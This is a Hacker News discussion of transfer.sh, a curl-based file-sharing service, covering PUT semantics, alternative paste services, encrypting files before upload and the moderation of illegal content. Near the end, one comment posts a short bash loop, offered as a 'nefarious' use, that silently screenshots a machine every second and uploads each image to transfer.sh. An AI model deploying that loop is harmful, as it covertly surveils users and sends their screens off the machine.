Hacker News new | past | comments | ask | show | jobs | submit login
$ cat ~/myfile | curl -X PUT --upload-file “-” https://transfer.sh/myfile.txt (transfer.sh)
296 points by _hv99 on March 20, 2016 | hide | past | favorite | 120 comments



FYI PUT is misused here. From RFC 7231 [1]:

    The PUT method requests that the state of the target resource be
    created or replaced with the state defined by the representation
    enclosed in the request message payload.  A successful PUT of a given
    representation would suggest that a subsequent GET on that same
    target resource will result in an equivalent representation being
    sent in a 200 (OK) response.
Placing the PUT body at a different location and returning a pointer to it is not supported by this definition. Furthermore:

    Proper interpretation of a PUT request presumes that the user agent
    knows which target resource is desired.  A service that selects a
    proper URI on behalf of the client, after receiving a state-changing
    request, SHOULD be implemented using the POST method rather than PUT.
    If the origin server will not make the requested PUT state change to
    the target resource and instead wishes to have it applied to a
    different resource, such as when the resource has been moved to a
    different URI, then the origin server MUST send an appropriate 3xx
    (Redirection) response; the user agent MAY then make its own decision
    regarding whether or not to redirect the request.
That is, to get the effect you intend, you should either (a) use POST (from which you should return a 201 with the final destination, not 200 like you currently do), or (b) issue a 307 redirect to the final destination of the PUT before accepting any content (and subsequently replying with a 201).

[1] http://tools.ietf.org/html/rfc7231#section-4.3.4


This was not an invalid use of PUT in RFC2616, then httpbis decided it always had been and changed it.


It was part of RFC 2616, also:

"The PUT method requests that the enclosed entity be stored under the supplied Request-URI. If the Request-URI refers to an already existing resource, the enclosed entity SHOULD be considered as a modified version of the one residing on the origin server. If the Request-URI does not point to an existing resource, and that URI is capable of being defined as a new resource by the requesting user agent, the origin server can create the resource with that URI.

".. The fundamental difference between the POST and PUT requests is reflected in the different meaning of the Request-URI. The URI in a POST request identifies the resource that will handle the enclosed entity. That resource might be a data-accepting process, a gateway to some other protocol, or a separate entity that accepts annotations. In contrast, the URI in a PUT request identifies the entity enclosed with the request -- the user agent knows what URI is intended and the server MUST NOT attempt to apply the request to some other resource."

RFC2616[1] Fielding, et al.

This is a key part of the spec, and you can see Dr. Fielding's intentions in REST. Specific URI 's referring to a Representation of an entity is a core architectural component of REST[2].

1. https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html#sec9....

2. https://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm


colanderman is correct in his reply. Although RFCs are designed to be very explicit, certain sections are all too often left open to interpretation when vague/ambiguous language is used.

This is not one of those times. It is very clearly defined that PUT, by design, creates a resource at the exact URL provided. The 307 redirect variant mentioned is over-complicating the scenario. The right thing to do is use POST and return 201 Created with a Location header to the created URL.

Just because it works as-is doesn't mean there isn't a better way that strictly follows expected behaviors.


Why give that elaborate command line call instead of the clearer, simpler one in the example?

    curl --upload-file ./hello.txt https://transfer.sh/hello.txt
In any case - cool! Good domain name too.


I think the point is to illustrate that you can pipe things into it. There exist programs that work on files, and work much worse or not at all on standard input; this example thus demonstrates more power.

(Though, alluded to below, the "-X PUT" may be totally superfluous.)


The pipe is into curl, has nothing to do with the website itself


The website must support the feature. With `--upload-file` curl sends the `Content-Length` header; with the pipe it doesn’t.


You can do that with pure pipes, without cat:

    foo < input
This replaces foo's stdin with a pipe reading from input.


Or like this with HTTPie[0]:

    http PUT https://transfer.sh/hello.txt < ./hello.txt
[0] http://httpie.org


Because unlike these other examples, this one requires you to install something


"requires you to install something" is relative, depending on what's installed on your system. This example is a continuation of the 'elaborate vs. simpler command' theme of this thread for people who prefer HTTPie.


Just FYI, it would have been helpful if you had disclosed that you're the author of HTTPie.


FYI The "-X PUT" argument is not doing what you think it is[1], and is superfluous since you're using "--upload-file".

You almost never really want "-X".

[1]: https://curl.haxx.se/docs/manpage.html#-X


Just to clarify your point, --upload-file with a trailing slash results in a POST and without a trailing slash it results in a PUT.


Right. -X overrides this default behavior without otherwise affecting the semantics of the request.


Haw. I made quite the same service, curl compliant and stuff except it encrypts the file on disk upon reception (creating an AES cipher, piping the file through it while receiving it) and sending back the id of the file and the key that allows decryption of said file. If anyone is interested there's plenty of documentation, even a client that allows to take screenshots and upload them on the fly.

https://up.depado.eu

So yeah it's limited to 30MB for now because I don't have a lot of storage but hey I use that daily hehe


Very cool, though I find it a little odd. If someone is going the extra mile to store the file encrypted, it stands to reason that trusting the service with the initial unencrypted byte stream is a no-go. The file being uploaded over HTTPS, and your assurance that the stream is piped directly through encryption, is of little consequence if you or an infiltrator to your server were to choose to be malicious.

I understand it's impossible to tool the concept to work with a very simple shell one-liner, and without a further dependency like an openssl binary. I like the concept, but I'd rather have to perform a one-time install of openssl or similar and copy a 10-20 line bash script to have true security rather than your current setup that comes with a technically flawed security model.

Obviously you are aware of this, and chose the path of convenience and "good for most uses". Kudos for a clean tool!


Obviously it comes to personal judgment when people use my tools. I mean they could also do as described in transfer.sh, pipe first the data through gpg. The server accepts any kind of data as long as it doesn't overflow the current set size limit.

But indeed I do agree that I can't guarantee or even prove that I can't access the files on my server. That's why I offer a quick and simple way for people to setup this on their own machine, so they can have this lightweight server and use it as if it was mine just by modifying a line in the configuration file of the client (or changing the URL in the curl commands)

I'm glad you enjoyed the tool though :D


I also made a similar service, mostly for my own needs so it's kinda spartan, I find it convenient for grabbing stuff off my clipboard and screenshots/captures:

http://paste.click/

It has a rudimentary android app as well.


It'd be cool to have the ability to pipe stuff over the Internet from shell in real time like you would with SSH for instance. So I could do:

A$ curl --upload-file - http://blah < /proc/kmsg

B$ curl http://blah/uYsfVX

and see live stream of data on B.


You can do that with netcat if either A or B are listening.


I do this fairly regularly.

    A$ tar cv * | nc -l -p 1234

    B$ nc a.example.net 1234 | tar xv
Or I might remove a 'v' and pipe through 'pv' to see the transfer rate and amount.


Well over the "Internet" kind of implies behind a firewall so the service would be a convenience to avoid setting up port forwarding etc.


VPN are a thing.

I recommend just installing cjdns and forwarding the home end. It also encrypts your traffic. You wouldn't want to netcat in cleartext over the internet.


You could always just pipe it through ssh or some other thing. Setting up openvpn or similar is nontrivial - even if you're lucky enough to have a static IP and enough spare time to make it work.


> Setting up openvpn or similar is nontrivial

Setting up cjdns is less work than setting up SSH.


Someone else in this thread mentioned chunk.io which offers this http://chunk.io/#stream_content_beta


That would be cool, but the devil is in the details. For one thing, does the "upload" wait for at least one "download" to connect? Or does "upload" go to a cache that is re-used for all subsequent downloads? What are the timeouts? E.g. how long would blah.com hold the upload connection open until (at least one) download opened up?

The other thing that makes it less cool is that it's a hack that would be better off not existing. The ideal case is that every device should have a unique ID, such that we can directly "subscribe" to anything on any device without using an intermediary (well, an application level intermediary anyway; you'll always be using link-level intermediaries). Such an ID might be IPv6, in which case such a service is trivially replaced with ordinary every day ssh/scp.


I think it should be as dumb and simple as possible and do nothing deviating from normal unix behavior (ie pipe). So it would cache only one chunk of data sent by A and start streaming to the first download request.



You can use netcat for that. Or Bash has built-in TCP support.


Regarding their tagline: “Easy file sharing from the command line”, this is also possible with Yandex Disk¹ (specifically, the Linux version here²). It also has less limitations than transfer.sh, specifically:

• 10 GB of space for free (with a 10 GB filesize limitation³) over transfer.sh’s 5 GB

• no file expiration date, unlike transfer.sh’s 14-day expiration

――――――

¹ — https://disk.yandex.com/

² — https://repo.yandex.ru/yandex-disk/

³ — https://en.wikipedia.org/wiki/Comparison_of_file_hosting_ser...



I built an R library for working with the b2 API:

https://github.com/phillc73/backblazer

It's on CRAN too, but the GitHub version has some updates.

This library should allow complete interaction with b2 for uploading, downloading and manipulating files from within R.


Yeah, but the thing is that with transfer.sh you don't have to install any applications on your machine. And if you look at the code, you'll see that the max size isn't being enforced.


I like using chunk.io for this purpose too

  $ curl -T path/to/file chunk.io


    chunk.io uses an invalid security certificate. The certificate is only valid for the following names: *.herokuapp.com, herokuapp.com Error code: SSL_ERROR_BAD_CERT_DOMAIN
I've signed up for the mailing list in the hopes of getting an actual contact email for the author/s.


Yeah! Me too. /s


It doesn't seem to be very cheep to run given enough users, yet I don't see anybody trying to sell me something. So, how?


Get users then start to offer premium features? Of the top of my head;

  * Increased filesize limits
  * Support for custom domains
  * Ability to set download limits or kill date per file
  * Analytics about file downloads
  * Support for hosted version


I always wonder how sites like these deal with stuff like potentially hosting child porn/other content that is illegal to possess. Does DCMA safe harbor stuff cover it? (don't see a DCMA notice on the site)


You can leave out the 'potentially'. I shut down a file sharing service specifically for that reason, it is just about impossible not to become a vector for the transmission of illegal or objectionable content. DMCA does not cover it, because the DMCA is about copyright, not about content that is illegal to possess regardless of how you got it. That said, the police (at least, the police here) is more than happy to work together with you to help keep the CP peddlers out but it's a losing battle, there are a very large number of them and you'll be hard pressed to work 24/7 all year long and since you can upload encrypted files you can't be sure of what's being transferred anyway.

Which is a good thing, after all what is being uploaded is strictly speaking none of my business but it automatically makes you complicit in roughly the same way that running a TOR exit node will make you complicit and I don't want any part of that. I'm perfectly ok with setting up useful services at very little or no fees at all but I refuse to become an unwitting and unwilling partner in other peoples illegal dealings.

Which is a pity.


We're lucky that some people are fine with becoming an unwilling partner since without them no internet, no phone, no email, no snail mail, no roads, no electricity, no open source software, no nothing. It's a sad fact of life that pretty much every useful technology, service or piece of infrastructure will be used for illegal dealings of some kind.


It's a matter of proportion to me. If a service is used predominantly to facilitate illegality then I see no reason to continue to run it.

The internet, phones, email, regular mail, roads, electricity, software and on on have predominantly good and productive uses. File sharing websites attract percentage wise more bad than good, at least more bad than what I'm comfortable with.

So in the end that's a moral call and in this case my decision was to shut it down because of the types of crimes involved and the number of criminals on the service totally outnumbered the 'good guys' and our ability to deal with the assholes was limited.


> If a service is used predominantly to facilitate illegality

I guess we should all stop using cash, then?

https://en.wikipedia.org/wiki/Contaminated_currency


It's obvious that you're trolling, but just in case you're not: Eventually you can expect a push against cash in the name of anti-terrorism and anti-crime campaigns. Obviously those will be founded in bull-shit but that's not going to stop it from happening. Whether or not it will succeed is mostly a matter of how it gets sold to the public.

As for how it is possible for all of the available currency to be contaminated with traces of drugs and yet that this does not need to prove that all (or even a majority) of the cash transactions done are drug related, I'm sure you're smart enough to figure that one out for yourself, but evidence such as this will figure prominently in the kind of discussion that will visit us some years into the future.


False analogy. Creating a file upload service with no authentication or no resources to keep it safe is like installing a fully loaded AK 47 at an intersection and hoping people would just use it to learn how it works or use in an emergency to shoot at criminals passing that intersection.

There are free file upload services and there are ways to upload from command line(1).

[1] https://github.com/andreafabrizi/Dropbox-Uploader


You cannot compare bytes on a disk with a gun. People don't die from transferring data.


https://www.microsoft.com/en-us/photodna

Microsoft provides an API which identifies child expoilting images.


How can you even test such a service legally?

This is a general problem with banning things instead of simply regulating them somehow. How would one scientifically study methamphetamine, for example, in a country where it is illegal to even possess it?

Without arguing for or against CP, what if I wanted to look up evidence that use of CP leads to increase or decrease of actual child abuse, without setting off red flags everywhere? As a Psych major, that sort of thing would interest me, for example.


> How can you even test such a service legally?

It's actually quite well designed and questions such as these were definitely taken into account during the design phase.

I came up with a similar scheme about 15 years ago (as a result of operating that file sharing service) and proposed to the local LE that we set up a service where a 'fingerprint' of an image could be tested against known bad images, and if an image tested positive it would be flagged for review (and on an exact match it would be automatically banned).

The local law enforcement officer thought it was a great idea but it would never fly because even the hashes of the images were considered off-limits for sharing with others and they'd have to share their database of hashes with me if I were to set this up (free of charge).

Eventually MS came up with PhotoDNA and they're too big to ignore.


So basically (probability of legal entity being a good actor) x (size of legal entity) must be >= some large number.

sigh, that's still less than ideal.


Agreed, but given the fact that this feeds into the legal system in a fairly direct way and that I'm only a 'one man shop' by their definition it makes good sense to insist on doing business with a larger party.

Where it goes haywire is that they then have to trust all the employees of that larger party as well but that's logic rather than CYA.


Yes, surprisingly I am more deeply concerned with the logic bit, lol


MSFT provides a set of sample images[1], some of which return as if they matched. The sample images are not child pornography, generally pictures of celebrities (which is really strange.)

[1]: http://wbintcvsstorage.blob.core.windows.net/matchedimages/S...


But wouldn't those matches count as classification errors?


I know. I helped them beta test that here in nl. Unfortunately it's not just still images. It's also videos, and encrypted still images and encrypted videos. Photodna comes into its own once you actually have an image.


I believe that DMCA safe harbor applies. If they're notified that they're hosting such content, then they have to remove it.


No. The safe harbor only applies to copyright infringement.


This reminds me of a node.js-based utility I wrote awhile back called filebounce[1], except filebounce streams a file over HTTP/HTTPS and does not store the file on an intermediary server. It also supports tailored curl and GUI browser-based interfaces. I use it as a simple way of copying a file without needing ssh, ftp, samba, etc.

[1] https://github.com/mscdex/filebounce


Similar project: https://curl.io/


Big difference with curl.io is that you don't need to register the file upfront.


Love the idea. But the link always leads to a page with the file on it, not the file itself. Specially for picture sharing that's not really acceptable for me.


I use sprunge [http://sprunge.us/] for the exact same purpose.

Normal usage: $ more c14.py | sprunge

And it outputs: http://sprunge.us/eCeM

The nice thing about sprunge is that you also have syntax highlighting: http://sprunge.us/eCeM?py

Appending a ?<lang> will syntax highlight the text according to the lang.

P.S.

To use a pipe with sprunge, put an alias in your .zshrc / .bashrc:

alias sprunge="curl -F 'sprunge=<-' http://sprunge.us"

and then use source ./zshrc ( or .bashrc ).


I think the newness about this is that they've released the code on github under MIT, so you can self-host the service if you want. I think none of the othe rprojects mentioned here have are opensource or have a slef-hosted version.


I wrote a sprunge clone with a gimmick (the URL contains the sha256 digest of the paste) to learn Go. Ships with a Dockerfile. Probably doesn't scale. Affero GPL.

https://github.com/tomjakubowski/yasuc


sprunge (apparently) is released under WTFPL, and the sources are here https://github.com/rupa/sprunge.

According to http://www.wtfpl.net/about/, the first rule (and the only rule) of WTFPL is:

0. You just DO WHAT THE FUCK YOU WANT TO.

So, I guess you can self host it (:


http://ix.io/

Uploading a file: curl -F 'f:1=@file.ext' ix.io


ix.io is really meant for text only, or very small files (max of about 4MB).

[I'm friends with the author.]


I might be unusual here, but I typically get stuck when trying to copy files off a remote Windows machine. Most recently was an aged Windows server with a version of internet explorer so old that all the modern file upload sites (e.g. https://file.io/) seemed to have JavaScript issues. Windows built in WebDAV support didn't work, because it's not installed on Windows server I think.

Can anyone come up with a way to use a service like this from an old version of Windows that lacks modern web browser, powershell and so on?


https://megatools.megous.com/ supports Windows. Not sure if it will run on an old version.


curl.exe / rsync.exe / winscp?


just transfer files from the old windows box using radmin or RDP


file.io has an API - you can just use curl for this


Why depend on a centralized service when there are easy-to-use decentralized alternatives?

  $ ipfs add myfile.txt
  added QmeeLUVdiSTTKQqhWqsffYDtNvvvcTfJdotkNyi1KDEJtQ myfile.txt
  # Access via a public gateway
  $ curl https://ipfs.io/ipfs/QmeeLUVdiSTTKQqhWqsffYDtNvvvcTfJdotkNyi1KDEJtQ
  # or via a local node
  $ curl http://127.0.0.1:8080/ipfs/QmeeLUVdiSTTKQqhWqsffYDtNvvvcTfJdotkNyi1KDEJtQ


1. If you're using ipfs.io, you're using a centralized service.

2. Why is a decentralized service better than a centralized one, for this use case? It seems like neither really has an inherent advantage.


1. ipfs.io is not a critical part of the system. If it becomes unavailable, the information can still be retrieved via a local node or another public gateway.

2. With a decentralized system like IPFS, availability of the data does not depend on a single provider. Also, there are no artificial limits on data size and storage time.


This isn't for long term storage, it's for ephemeral transfers between two well defined entities. Like if I, as developer A, need to give a large binary blob to another developer B. If we are not in close enough proximity for physical media transfer, something like this might be the next quickest option. There's no need to go through the work of distributed it through the ipfs network.

TLDR; different usecases.


This requires the service to be available at all times.

A much more ingenious approach is ipfs: [1]

[1] https://ipfs.io/


This is very cool. I build a similar tool for entire web projects called surge.sh

    surge path/to/project example.com


This is actually very useful.


You can use megatools to upload to a mega account from a command line, 50GB free, also encrypted.


What's the advantage of doing this instead of just using SCP or SFTP?


With SFTP and SCP you need to run a daemon on the hosting machine, and create credentials for the other user to login so it's a bunch of extra steps.

For a lot of people with firewalls and no root / admin access, it becomes a major pain.


It's kinda funny that everything runs on port 80/443 now a days because of this.


People who doesn't even know what a text shell is can just drag a file icon onto the page to upload. No accounts or passwords are involved at either end, so it's about as frictionless as possible.


Neat idea, and props for the https. Are the files encrypted on the server?


There's an example on how to encrypt the files before sending them to the server:

  # Encrypt files with password using gpg 
  $ cat /tmp/hello.txt|gpg -ac -o-|curl -X PUT --upload-file "-" https://transfer.sh/test.txt 
  
  # Download and decrypt 
  $ curl https://transfer.sh/1lDau/test.txt|gpg -o- > /tmp/hello.txt


Exactly, who trusts server side encryption anyway?


The first cat does absolutely nothing in your example.


are you sure? how else would you pipe to GPG?


Just redirect gpg's input from the file?

    gpg ... < hello.txt | curl ...
Its stdin will be the file instead of a pipe, but few programs care about the difference and fewer still in such a way that you'd prefer to use the pipe.


It doesn't appear so, no. The raw bytes seem to be dumped to temp files, local storage, or S3 [1][2] without mention of any sort of encryption step (or reading of a secret somewhere). As mentioned below, you could encrypt before uploading of course. Someone please correct me if I misread though.

[1] https://github.com/dutchcoders/transfer.sh/blob/master/trans...

[2] https://github.com/dutchcoders/transfer.sh/blob/master/trans...


I built a similar service but for email:

Send files to i@nfil.es

Then you'll get something like this https://nfil.es/EOir5z/


How is it better than: [brew install gist] gist myfile.txt


Using lisp with drakma, the following function save under name some content.

* (defun save(name content) (multiple-value-bind (a b c) (http-request (format nil "https://transfer.sh/~a" name) :method :put :content (write-to-string content)) (list a b c)))


Very similar to a project of mine from 5 years ago: http://sbit3.me

I even had a YN post: https://news.ycombinator.com/item?id=2598682 :)


    PS> cat myfile | out-string | iwr -Method Put -Uri https://transfer.sh/myfile.txt


  PS> Invoke-SSHCommand { cat ~/myfile | curl -X PUT --upload-file “-” https://transfer.sh/myfile.txt } -session 0
SSH.NET: https://sshnet.codeplex.com/


Obligatory xkcd : https://xkcd.com/949/


Just drop it on one of the folders in your Dropbox that's also served by IIS on one of your boxen. Then simply link from the appropriate subdomain on your personal domain. Been doing this for 15 years, dunno why nobody else does.


Cool story bro. Guess you were on a very early dropbox beta.


I have been using paste.click [0] for a while, it is similar to this. I use to share snippets of code, or screenshots

[0] http://paste.click/


You made my day;

I've been using http://mktorrent.sourceforge.net/ for quite sometime now


Reminds me an other project: https://github.com/guits/pastefile


Yes, it's a good project, i use pastefile very often !


I like these simple web services.

One I use all the time is sprunge.us -

   $ echo "hello world" | curl -F sprunge="<-" sprunge.us
   http://sprunge.us/MEPN


Useless Use Of Cat.


https://ptpb.pw does pretty much the same exact thing and more.


Btw on mobile it's not clear which line is input and which line is output. Perhaps make them in slightly different colors.


What is the business plan? Ads?


Idea where can such service be used for nefarious purposes:

  while true
  do 
    dt=$(date '+%d%m%Y%H:%M:%S');
    screencapture -x file$dt.png
    curl --upload-file ./file$dt.png https://transfer.sh/66nb8/capture$dt.png
    rm file$dt.png
    sleep 1
  done


If you can get that script to run on a user's machine, they're hosed whether or not this service exists. Curl or mail to an endpoint in the attacker's control would be equally effective.


Sorry, I did not intend to discount this service in any way. More like showing a practical use.


Are the files being accepted by your service as multipart/form-data?


This seems like the same as termbin.com to me.


How do people feel about .sh domains?


Unfortunately, it is not practical to run this at home, because of asymmetric up/download speeds of my internet provider (upload is 20x slower than download).

Sigh!


There are a lot of sites like this. The only thing that's sorta neat about this file is that the filesize limit is so high. Getting around the size limit is fairly easy by using split or something similar so that's not too big of a deal.

Others that come to mind are pomf.se clones like 1339.cf or comfy.moe and nekuneku's current site, uguu.se. Many paste services could also be used to achieve the same result, ix.io and sprunge.us come to mind.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: